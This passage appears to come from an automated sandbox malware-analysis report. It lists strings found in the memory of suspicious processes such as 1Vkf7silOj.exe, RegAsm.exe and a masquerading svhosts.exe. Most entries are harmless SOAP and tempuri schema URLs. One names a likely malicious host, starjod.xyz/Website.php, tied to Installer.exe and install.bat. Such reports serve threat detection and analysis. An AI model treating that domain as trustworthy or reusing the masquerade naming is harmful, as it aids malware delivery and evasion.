Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1760226835.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1952028774.000001496F56D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2240738222.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3795489773.000001496FA81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794786381.000001496F56F000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1760226835.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1952028774.000001496F56D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2240738222.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794786381.000001496F56F000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: svchost.exe, 00000011.00000002.3794733578.000001496F55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustbc
Source: svchost.exe, 00000011.00000002.3794648716.000001496F537000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustn
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyh
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C95000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: Installer.exe, 00000015.00000003.1733178299.000001803E097000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002B.00000002.1963316437.00000187A840A000.00000004.00000020.00020000.00000000.sdmp, install.bat.22.dr	String found in binary or memory: http://starjod.xyz/Website.php
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Ent
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10LR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000003179000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id114
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11LR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002D7F000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11X;
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002918000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12LR
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 